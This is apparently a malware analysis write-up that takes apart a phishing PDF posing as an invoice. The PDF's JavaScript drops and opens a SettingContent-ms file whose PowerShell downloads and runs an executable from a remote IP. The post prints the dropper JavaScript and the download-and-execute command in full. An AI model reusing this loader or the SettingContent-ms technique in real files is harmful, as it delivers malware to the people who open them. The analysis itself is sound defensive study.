This is a neat PDF sample that I saw mentioned on @c0d3inj3cT’s Twitter, and wanted to take a look for myself. As @c0d3inj3cT says, it is a PDF that drops a SettingsContent-ms file, which then uses PowerShell to download and execute the next stage. I had been on the lookout for PDFs that try to run code to play with, so this seemed like a good place to dive in.

File Info

Filename inovoice-019338.pdf
sha256 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
VT Link https://www.virustotal.com/#/file/576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4/details
References https://twitter.com/c0d3inj3cT/status/1017553433128103936
  https://www.hybrid-analysis.com/sample/576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4?environmentId=120

Why This Post

There’s nothing at all ground-breaking in this post. In fact, I’ll come to the same conclusions that @c0d3inj3cT does. Still, as I’m a bit more of a noob at this, I thought it would be useful to do the anaylsis myself, and this post is just to show my work.

PDF Tools

To look at a pdf file, I’ll use heavily two tools from Didier Stevens, pdfid and pdf-parser. pdfid provides an overview of objects in a pdf, and highlights suspicious ones that could be used for malicious activity. pdf-parser can break out objects, including decoding raw stream to get to their underlying data.

inovoice-019338.pdf

Overview of Features w/ pdfid

We’ll start with pdfid, which will give us an overview of the different types of tags / objects in the pdf file:

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdfid 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
PDFiD 0.2.5 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
 PDF Header: %PDF-1.4
 obj                   13
 endobj                13
 stream                 3
 endstream              3
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    2
 /JavaScript            3
 /AA                    0
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /EmbeddedFile          1
 /XFA                   0
 /URI                   0
 /Colors > 2^24         0

Right off the bat, the things that jump out at me at the /OpenAction and the javascript (/JS and /JavaScript).

Pivoting From /OpenAction

Now we dive in with pdf-parser. First, let’s check out the /OpenAction, since that will run on opening the pdf.

emnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser --search OpenAction 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
bj 12 0
 Type: /Catalog
 Referencing: 7 0 R, 11 0 R

  <<
    /Type /Catalog
    /Pages 7 0 R
    /Names 11 0 R
    /OpenAction
      <<
        /S /JavaScript
        /JS '(function11\\(\\)'
        ; )
      >>
  >>

It’s going to call a javascript function function11(), and based on the /Names tag, we’ll pivot to object 11 to look for it. Let’s dump that:

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser --object 11 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
obj 11 0
 Type:
 Referencing: 9 0 R, 10 0 R

  <<
    /JavaScript 9 0 R
    /EmbeddedFiles 10 0 R
  >>

That points to javascript in object 9, and an embedded file in object 10. We’ll follow the javascript in 9, which points us to 4, which points to 3:

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser --object 9 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
obj 9 0
 Type:
 Referencing: 4 0 R

  <<
    /Names [(0000000000000000) 4 0 R]
  >>


remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser --object 4 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
obj 4 0
 Type:
 Referencing: 3 0 R

  <<
    /S /JavaScript
    /JS 3 0 R
  >>

Dumping object 3 shows it contains a stream, which is encoded (/FlateDecode):

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 --object 3
obj 3 0
 Type:
 Referencing:
 Contains stream

  <<
    /Length 136
    /Filter /FlateDecode
  >>

Javascript

If we add --raw and --filter to the dump, we can see the full javascript. We’ll run pdf-parser 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 --object 3 --raw --filter to get:

function function11(){
var functionDataMass = {};functionDataMass['nLaunch'] = 2;

functionDataMass['cName'] = 'downl.SettingContent-ms';

functionDataMass['r2'] = 'exportDataObject';
this[functionDataMass['r2']](functionDataMass);}

Javascript doc.exportDataObject

A file inside a PDF is known as a “Data Object”. There’s a function doc.exportDataObject that can be used to write a file to disk and potentially open it. One reference for Data Objects in PDFs can be found here.

According to the Adobe Javascript Spec, the exportDataObject functions takes a up to four parameters:

  • cName - The name of the object to extract
  • cDIPath (optional) - Path to extract the data, but no longer supported as of version 6.
  • bAllowAuth (optional) - If true, will prompt user for Authorization. Default is false.
  • nLaunch (optional) - Controls if the file is launched (opened) after saving.
    0 - Save, don’t launch.
    1 - Save and launch. Prompt user for path to save.
    2 - Save and launch. Save to temporary path.

File Export in this Document

With that in mind, let’s review the script above. This is pretty simple, unobfuscated javacsript. It creates a dictionary object in the first three lines, which will look like this:

{ 'r2': 'exportDataObject', 'nLaunch': 2, 'cname': 'downl.SettingContent-ms' }

Then it calls this[functionDataMass['r2']](functionDataMass);, which is practically simplifies to this.exportDataObject({'nLaunch': 2, 'cname': 'downl.SettingContent-ms'}) . That will save the file downl.SettingContent-ms to temporary space, and then open it. It will pop a prompt asking the user if they want to do this, but if they do, the file will open.

Embedded File

Now we’d better figure out what the embedded file is. Above we saw a reference to it at object 10. Let’s check that out:

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 --object 10
obj 10 0
 Type:
 Referencing: 2 0 R

  <<
    /Names [(downl.SettingContent-ms) 2 0 R]
  >>

Unsurprisingly, we see the file is named downl.SettingContent-ms. Let’s pivot to object 2, which will refer us to object 1, to see what it looks like:

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 --object 2
obj 2 0
 Type: /Filespec
 Referencing: 1 0 R, 1 0 R

  <<
    /Type /Filespec
    /F (downl.SettingContent-ms)
    /UF (downl.SettingContent-ms)
    /EF
      <<
        /F 1 0 R
        /UF 1 0 R
      >>
    /Desc (downl.SettingContent-ms)
  >>


remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 --object 1
obj 1 0
 Type: /EmbeddedFile
 Referencing:
 Contains stream

  <<
    /Length 508
    /Type /EmbeddedFile
    /Filter /FlateDecode
    /Params
      <<
        /ModDate "(D:20180712121742+03'00')"
        /Size 905
      >>
  >>

Again adding --raw --filter will give us the raw file.

Overall PDF structure

Now, we have the structure of the PDF, at least as far as objects that relate to script that will run on opening the document:

downl.SettingContent-ms

.SettingContent-ms

So what is a .SettingContent-ms file? It was introduced in Windows 10 to allow creating shortcuts to Windows 10 settings pages. However, with the <DeepLink> tag, attackers have figured out that they can run arbitrary PowerShell inside of one. They have been used to get around Application Whitelisting, and blocking of malicious attachments.

File From this PDF

So let’s check out this file:

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
 <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
  <ApplicationInformation>
   <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
   <DeepLink>Powershell -nop -windowstyle hidden -c
  $a='http://169.239.129.117/cal'
   $b=\"$env:temp\update12.exe\"
   $webc = [System.Net.WebClient]::new()
   $webc.DownloadFile($a, $b)
   $pclass = [wmiclass]'root\cimv2:Win32_Process'
   $pclass.Create($b, '.', $null)
   </DeepLink>
   </ApplicationInformation>
  <SettingIdentity>
   <PageID></PageID>
   <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
  </SettingIdentity>
  <SettingInformation>
   <Description>@shell32.dll,-4161</Description>
   <Keywords>@shell32.dll,-4161</Keywords>
   </SettingInformation>
  </SearchableContent>
 </PCSettings>

Basically, it runs the following PowerShell:

   $a='http://169.239.129.117/cal'
   $b=\"$env:temp\update12.exe\"
   $webc = [System.Net.WebClient]::new()
   $webc.DownloadFile($a, $b)
   $pclass = [wmiclass]'root\cimv2:Win32_Process'
   $pclass.Create($b, '.', $null)

It creates a WebClient object, uses it to download a malicious exe, and uses WMI to start the process.

User Experience

On opening the document, there’s not much there, but it does try to open the file immediately. As the Adobe Javascript documentation indicated, there is a pop up when this occurs:

On clicking open, a blue PowerShell window pops up for a second, and then disappears. I suspect if it was able to talk to the c2 ip, it would disappear much faster.

If we check in the PowerShell event logs (remember we configured Windows to do PowerShell script block logging in this post, we can see the script ran as expected:

Stage Two - update12.exe

At the time of this writing, the second stage download server was no longer up. This isn’t surprising, since the document has a creation date of 12 July, and was first submitted to VT that same day.

According to others who have looked at this file, it sounds like it was downloading FlawedAmmyy (ref, ref)

Summary

While not nearly as common as macro enabled documents in phishing, there are still actors out there using PDFs to spearphish. This one was using a technique that Spector Ops blogged about on June 11, the SettingContent-ms file. It was pretty simple to break down the document and see what’s going on.